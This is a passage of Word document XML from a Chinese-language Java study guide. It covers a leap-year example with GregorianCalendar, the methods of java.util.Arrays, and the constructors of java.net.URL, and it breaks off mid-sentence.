    <w:p w14:paraId="1DD0DE29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      System.out.println(gcalendar.get(Calendar.SECOND));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E77A3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B49BB4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试当前年份是否为闰年</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A3288D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      if(gcalendar.isLeapYear(year)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C579040" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前年份是闰年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5645B7B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA61131" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEE6E9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前年份不是闰年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2215CFB5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CE0A5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306FEFFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5156C02F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0817ADE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F77672A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72BD6D7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681DDC80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CA10C04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2956D669" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="036C55A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1DF95F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF4A355" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2AA40E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E4A56C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EAAEF22" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="734" w:name="_Toc159780163"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>java.util.Arrays</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：操作数组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="734"/>
    </w:p>
    <w:p w14:paraId="0EA4CF76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">java.util.Arrays </w:t>
      </w:r>
      <w:r>
        <w:t>类能方便地操作数组，它提供的所有方法都是静态的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B788C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1306385F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>具有以下功能：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AD4955" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>给数组赋值：通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fill </w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E34441" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>对数组排序：通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sort </w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t>按升序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BE4D8D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>比较数组：通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:t>方法比较数组中元素值是否相等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B1EF31" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>查找数组元素：通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binarySearch </w:t>
      </w:r>
      <w:r>
        <w:t>方法能对排序好的数组进行二分查找法操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033203E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30CC1A8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public static int binarySearch(Object[] a, Object key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212322BD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>用二分查找算法在给定数组中搜索给定值的对象</w:t>
      </w:r>
      <w:r>
        <w:t>(Byte,Int,double</w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>。数组在调用前必须排序好的。如果查找值包含在数组中，则返回搜索键的索引；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (-(</w:t>
      </w:r>
      <w:r>
        <w:t>插入点</w:t>
      </w:r>
      <w:r>
        <w:t>) - 1)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF867C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B22332" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public static boolean equals(long[] a, long[] a2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FD1034" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>如果两个指定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> long </w:t>
      </w:r>
      <w:r>
        <w:t>型数组彼此相等，则返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果两个数组包含相同数量的元素，并且两个数组中的所有相应元素对都是相等的，则认为这两个数组是相等的。换句话说，如果两个数组以相同顺序包含相同的元素，则两个数组是相等的。同样的方法适用于所有的其他基本数据类型（</w:t>
      </w:r>
      <w:r>
        <w:t>Byte</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>short</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Int</w:t>
      </w:r>
      <w:r>
        <w:t>等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6368F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26BEAFE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public static void fill(int[] a, int val)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6F51DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>将指定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> int </w:t>
      </w:r>
      <w:r>
        <w:t>值分配给指定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> int </w:t>
      </w:r>
      <w:r>
        <w:t>型数组指定范围中的每个元素。同样的方法适用于所有的其他基本数据类型（</w:t>
      </w:r>
      <w:r>
        <w:t>Byte</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>short</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Int</w:t>
      </w:r>
      <w:r>
        <w:t>等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A46B6B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB9C383" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public static void sort(Object[] a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E31B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>对指定对象数组根据其元素的自然顺序进行升序排列。同样的方法适用于所有的其他基本数据类型（</w:t>
      </w:r>
      <w:r>
        <w:t>Byte</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>short</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Int</w:t>
      </w:r>
      <w:r>
        <w:t>等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E14F026" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="144DB906" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="735" w:name="_Toc159780164"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="735"/>
    </w:p>
    <w:p w14:paraId="04BFDF25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/Dog_dream/article/details/89073363</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE03840" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的构造传参</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DAD6B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>protocol://host:port/path?query#fragment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516C717D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.baidu.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484AB308" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C325F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL(String spec)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示形成一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D93D8A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL(String protocol, String host, int port, String file)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从指定对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> host </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数，和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEA9459" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL(String protocol, String host, int port, String file, URLStreamHandler handler)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>指定对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> host </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> handler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149D78C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL(String protocol, String host, String file)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从指定的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名称，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名称和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名称创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DEFF0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL(URL context, String spec)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过在指定的上下文中解析给定的规范来创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEBBD30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL(URL context, String spec, URLStreamHandler handler)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过在指定上下文中使用指定的处理程序解析给定规范来创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C5B300" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2670FBAA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类本身不会根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RFC2396</w:t>
      </w:r>
